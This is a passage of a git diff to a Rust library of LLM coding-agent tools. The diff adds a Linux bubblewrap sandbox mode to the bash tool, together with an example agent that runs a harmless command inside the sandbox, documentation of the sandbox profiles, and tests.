availability = Availability::detect(); + if let Some(reason) = availability.reason() { + eprintln!("bubblewrap is unavailable: {reason}"); + return Ok(()); + } + + let workspace = std::env::current_dir()?; + let sandbox_root = tempfile::Builder::new() + .prefix("llm-coding-tools-serdesai-sandboxed-bash-") + .tempdir()?; + let synthetic_home = sandbox_root.path().join("home"); + let cache_root = sandbox_root.path().join("cache"); + let host_tmp = sandbox_root.path().join("host-tmp"); + fs::create_dir_all(&synthetic_home)?; + fs::create_dir_all(&cache_root)?; + fs::create_dir_all(&host_tmp)?; + + let profile = Builder::public_bot( + &*workspace, + &*synthetic_home, + &*cache_root, + Some(TmpBacking::BindHost(host_tmp.clone().into_boxed_path())), + ) + .with_availability(availability) + .build()?; + + let bash = BashTool::host() + .with_linux_bwrap(profile) + .with_default_timeout(std::time::Duration::from_secs(20)) + .with_default_workdir(&workspace); + + let mut pb = SystemPromptBuilder::new().working_directory(workspace.display().to_string()); + let model = OpenAIChatModel::new(MODEL_ID, api_key).with_base_url(BASE_URL); + let agent = AgentBuilder::<(), String>::new(model) + .instructions( + "Use bash exactly once, rely on its output, and explain briefly why the result shows sandboxed execution.", + ) + .tool(pb.track(bash)) + .system_prompt(pb.build()) + .build(); + + println!( + "=== Sandboxed Bash Agent Ready ({} tools) ===", + agent.tools().len() + ); + println!("Profile: public_bot"); + println!("Workspace: {}", workspace.display()); + println!("Sandbox root: {}", sandbox_root.path().display()); + println!("Synthetic home: {}", synthetic_home.display()); + println!("Cache root: {}", cache_root.display()); + println!("Host tmp bound to /tmp: {}", host_tmp.display()); + + println!("\n=== Running Agent ==="); + let prompt = "Use bash exactly once to run `printf 'PWD=%s\\nHOME=%s\\nCAT=%s\\n' \"$PWD\" \"$HOME\" \"$(command -v cat)\" && printf 'hello-through-cat\\n' | cat` and then explain briefly why the result shows a sandboxed shell with an extra system binary available."; + let mut stream = agent.run_stream(prompt, ()).await?; + + let mut request_id = 0u32; + log_xml(request_id, "user", prompt); + request_id = request_id.saturating_add(1); + let mut assistant_message = String::with_capacity(256); + + while let Some(event) = stream.next().await { + match event? { + AgentStreamEvent::TextDelta { text, .. } => assistant_message.push_str(&text), + AgentStreamEvent::RequestStart { .. } => assistant_message.clear(), + AgentStreamEvent::ToolCallStart { tool_name, .. } => { + log_xml(request_id, "tool", &tool_name); + request_id = request_id.saturating_add(1); + } + AgentStreamEvent::ResponseComplete { .. } => { + log_xml(request_id, "assistant", &assistant_message); + request_id = request_id.saturating_add(1); + } + _ => {} + } + } + + Ok(()) +} diff --git a/src/llm-coding-tools-serdesai/examples/serdesai-sandboxed.rs b/src/llm-coding-tools-serdesai/examples/serdesai-sandboxed.rs index bdf05ec7..e62916a7 100644 --- a/src/llm-coding-tools-serdesai/examples/serdesai-sandboxed.rs +++ b/src/llm-coding-tools-serdesai/examples/serdesai-sandboxed.rs @@ -21,7 +21,7 @@ use std::fmt::Write; // Set your OpenAI API key here or via OPENAI_API_KEY environment variable. /// Fallback API key if env var is not set. Leave empty to require env var. const OPENAI_API_KEY: &str = ""; -const OPENAI_MODEL: &str = "hf:zai-org/GLM-4.7"; +const OPENAI_MODEL: &str = "hf:zai-org/GLM-4.7-Flash"; const OPENAI_BASE_URL: &str = "https://api.synthetic.new/openai/v1"; fn get_openai_api_key() -> String { diff --git a/src/llm-coding-tools-serdesai/examples/serdesai-task.rs b/src/llm-coding-tools-serdesai/examples/serdesai-task.rs index d30de4e8..a22c0489 100644 --- a/src/llm-coding-tools-serdesai/examples/serdesai-task.rs +++ b/src/llm-coding-tools-serdesai/examples/serdesai-task.rs @@ -21,7 +21,7 @@ use std::{ }; const AGENT_NAME: &str = "orchestrator"; -const MODEL_ID: &str = "synthetic/hf:zai-org/GLM-4.7"; +const MODEL_ID: &str = "synthetic/hf:zai-org/GLM-4.7-Flash"; const API_KEY_NAME: &str = "SYNTHETIC_API_KEY"; const API_KEY_VALUE: &str = ""; // <-- Set your API key here diff --git a/src/llm-coding-tools-serdesai/src/bash.rs b/src/llm-coding-tools-serdesai/src/bash.rs index fab06a40..5434debc 100644 --- a/src/llm-coding-tools-serdesai/src/bash.rs +++ b/src/llm-coding-tools-serdesai/src/bash.rs @@ -1,17 +1,42 @@ //! Shell command execution tool. //! -//! Provides cross-platform shell command execution with timeout support. +//! # Public API +//! +//! - [`BashTool::host`] — runs commands directly on the host shell. +//! - [`BashTool::new`] — backward-compatible alias for [`BashTool::host`]. +#![cfg_attr( + all(feature = "linux-bubblewrap", target_os = "linux"), + doc = "\ + - [`BashTool::with_linux_bwrap`] — runs commands inside a Linux bubblewrap sandbox.\n\ + \n\ + # Linux Sandbox Profiles\n\ + \n\ + On Linux with the `linux-bubblewrap` feature, commands can run \ + inside a bubblewrap sandbox. Two profile presets are available:\n\ + \n\ + - [`Builder::public_bot`](crate::profile::Builder::public_bot) — \ + strict isolation for untrusted input.\n\ + - [`Builder::trusted_maintenance`](crate::profile::Builder::trusted_maintenance) — \ + looser sandbox for build automation. Not safe against hostile commands.\n\ + \n\ + See the workspace guide at \ + \ + for full profile configuration and setup instructions." +)] use crate::convert::to_serdes_result; use async_trait::async_trait; use llm_coding_tools_core::context::{ToolContext, ToolPrompt}; use llm_coding_tools_core::tool_metadata::bash as bash_meta; -use llm_coding_tools_core::tools::execute_command; +use llm_coding_tools_core::tools::{BashExecutionMode, execute_command_with_mode}; use serde::Deserialize; use serdes_ai::tools::{RunContext, SchemaBuilder, Tool, ToolDefinition, ToolError, ToolResult}; use std::path::{Path, PathBuf}; use std::time::Duration; +#[cfg(all(feature = "linux-bubblewrap", target_os = "linux"))] +use llm_coding_tools_bubblewrap::profile::{NetworkPolicy, Profile}; + /// Arguments for the bash tool. #[derive(Debug, Clone, Deserialize)] struct BashArgs { @@ -26,19 +51,46 @@ struct BashArgs { /// Tool for executing shell commands. /// /// Uses bash on Unix, cmd on Windows. -#[derive(Debug, Clone, Default)] +#[derive(Debug, Clone)] pub struct BashTool { + /// Explicit execution mode for this tool instance. + mode: BashExecutionMode, // ZST. 0 bytes when all optionals disabled. /// Default timeout for commands when not specified in args. default_timeout: Option, /// Default working directory when not specified in args. default_workdir: Option, } +impl Default for BashTool { + fn default() -> Self { + Self::host() + } +} + impl BashTool { /// Creates a new bash tool instance with default settings. + /// + /// This is an alias for [`Self::host`] for backward compatibility. + /// Prefer [`Self::host`] in examples so host execution stays explicit. #[inline] pub fn new() -> Self { - Self::default() + Self::host() + } + + /// Creates a bash tool that runs commands directly on the host shell. + /// On Linux with the `linux-bubblewrap` feature, call `with_linux_bwrap` instead + /// to sandbox commands. + pub fn host() -> Self { + Self { + mode: BashExecutionMode::Host, + default_timeout: None, + default_workdir: None, + } + } + + /// Returns the configured execution mode. + pub fn mode(&self) -> &BashExecutionMode { + &self.mode } /// Sets the default timeout for commands. @@ -56,6 +108,33 @@ impl BashTool { self.default_workdir = Some(workdir.into()); self } + + /// Runs commands inside a Linux sandbox using bubblewrap. + /// + /// Accepts an owned [`Profile`] or `Arc` to share one profile across + /// multiple tool instances. + /// + /// Build a profile with [`crate::profile::Builder::public_bot`] for untrusted input + /// or [`crate::profile::Builder::trusted_maintenance`] for build automation that + /// needs network access. Call [`crate::profile::Availability::detect`] at startup to + /// verify the sandbox is usable. + /// + /// # Platform + /// + /// Only available on Linux with the `linux-bubblewrap` feature enabled. + /// + /// # Warnings + /// + /// Trusted-maintenance profiles allow network access and are not safe against + /// hostile commands. Pass only short-lived tokens via `with_extra_env` and + /// job-scoped read-only files via `with_credential_file_mounts`. Do not forward + /// SSH agents or mount full host credential stores. + /// + #[cfg(all(feature = "linux-bubblewrap", target_os = "linux"))] + pub fn with_linux_bwrap(mut self, profile: impl Into>) -> Self { + self.mode = BashExecutionMode::LinuxBwrap(profile.into()); + self + } } #[async_trait] @@ -88,6 +167,14 @@ impl Tool for BashTool { ) } + /// Executes a shell command through the configured [`BashExecutionMode`]. + /// + /// # Errors + /// + /// - [`ToolError::ValidationFailed`] if the JSON arguments fail deserialization. + /// - [`ToolError::ExecutionFailed`] if the command cannot be spawned, the per-command + /// workdir is invalid, or a timeout or I/O failure occurs while collecting + /// output. async fn call(&self, _ctx: &RunContext, args: serde_json::Value) -> ToolResult { let args: BashArgs = serde_json::from_value(args) .map_err(|e| ToolError::validation_error(bash_meta::NAME, None, e.to_string()))?; @@ -106,29 +193,67 @@ impl Tool for BashTool { .or(self.default_timeout) .unwrap_or(Duration::from_millis(bash_meta::DEFAULT_TIMEOUT_MS)); - let result = execute_command(&args.command, workdir, timeout).await; + // Route execution through mode-aware entrypoint to honor explicit mode selection + let result = execute_command_with_mode(&self.mode, &args.command, workdir, timeout).await; to_serdes_result(bash_meta::NAME, result.map(|output| output.format_output())) } } +#[inline] +fn bash_prompt_network_disabled(mode: &BashExecutionMode) -> bool { + #[cfg(all(feature = "linux-bubblewrap", target_os = "linux"))] + { + matches!( + mode, + BashExecutionMode::LinuxBwrap(config) + if matches!(config.network_policy(), NetworkPolicy::Disabled) + ) + } + + #[cfg(not(all(feature = "linux-bubblewrap", target_os = "linux")))] + { + let _ = mode; + false + } +} + +#[inline] +fn bash_prompt_sandboxed(mode: &BashExecutionMode) -> bool { + #[cfg(all(feature = "linux-bubblewrap", target_os = "linux"))] + { + matches!(mode, BashExecutionMode::LinuxBwrap(_)) + } + + #[cfg(not(all(feature = "linux-bubblewrap", target_os = "linux")))] + { + let _ = mode; + false + } +} + impl ToolContext for BashTool { const NAME: &'static str = bash_meta::NAME; fn context(&self) -> ToolPrompt { - ToolPrompt::Bash + ToolPrompt::Bash { + network_disabled: bash_prompt_network_disabled(&self.mode), + sandboxed: bash_prompt_sandboxed(&self.mode), + } } } #[cfg(test)] mod tests { use super::*; + use serial_test::serial; fn mock_ctx() -> RunContext<()> { RunContext::minimal("test-model") } #[tokio::test] + #[serial] async fn executes_echo() { let tool = BashTool::new(); let args = serde_json::json!({ @@ -140,6 +265,7 @@ mod tests { } #[tokio::test] + #[serial] async fn timeout_returns_error() { let tool = BashTool::new(); let cmd = if cfg!(target_os = "windows") { @@ -156,6 +282,7 @@ mod tests { } #[tokio::test] + #[serial] async fn workdir_parameter_changes_directory() { let temp = tempfile::TempDir::new().unwrap(); let temp_path = temp.path().to_string_lossy(); @@ -176,6 +303,7 @@ mod tests { } #[tokio::test] + #[serial] async fn default_workdir_is_used() { let temp = tempfile::TempDir::new().unwrap(); let temp_path = temp.path().to_string_lossy(); @@ -194,6 +322,7 @@ mod tests { } #[tokio::test] + #[serial] async fn per_call_timeout_overrides_default() { // Constructor sets 10s default, but per-call arg specifies 100ms let tool = BashTool::new().with_default_timeout(Duration::from_secs(10)); @@ -212,6 +341,7 @@ mod tests { } #[tokio::test] + #[serial] async fn default_timeout_used_when_arg_omitted() { let tool = BashTool::new().with_default_timeout(Duration::from_millis(100)); let cmd = if cfg!(target_os = "windows") { @@ -226,4 +356,29 @@ mod tests { let result = tool.call(&mock_ctx(), args).await; assert!(result.is_err()); } + + #[tokio::test] + #[serial] + async fn new_reports_host_mode_by_default() { + let tool = BashTool::new(); + assert!(matches!(tool.mode(), BashExecutionMode::Host)); + } + + #[tokio::test] + #[serial] + async fn bash_context_reports_host_mode() { + use llm_coding_tools_core::context::ToolPrompt; + + let host_tool = BashTool::new(); + assert!( + matches!( + host_tool.context(), + ToolPrompt::Bash { + network_disabled: false, + sandboxed: false, + } + ), + "host bash should report network_disabled: false, sandboxed: false" + ); + } } diff --git a/src/llm-coding-tools-serdesai/src/lib.rs b/src/llm-coding-tools-serdesai/src/lib.rs index cb5ee3b4..7a4384eb 100644 --- a/src/llm-coding-tools-serdesai/src/lib.rs +++ b/src/llm-coding-tools-serdesai/src/lib.rs @@ -15,6 +15,13 @@ pub mod webfetch; /// Re-export core types for convenience. pub use llm_coding_tools_core::{ToolError, ToolOutput, ToolResult}; +/// Re-export bash execution mode and mode-aware execution. +pub use llm_coding_tools_core::{BashExecutionMode, execute_command_with_mode}; + +/// Re-export preferred Linux bubblewrap profile types +#[cfg(all(feature = "linux-bubblewrap", target_os = "linux"))] +pub use llm_coding_tools_bubblewrap::profile; + /// Re-export context module and [`ToolContext`] trait for convenience. pub use llm_coding_tools_core::ToolContext; pub use llm_coding_tools_core::context;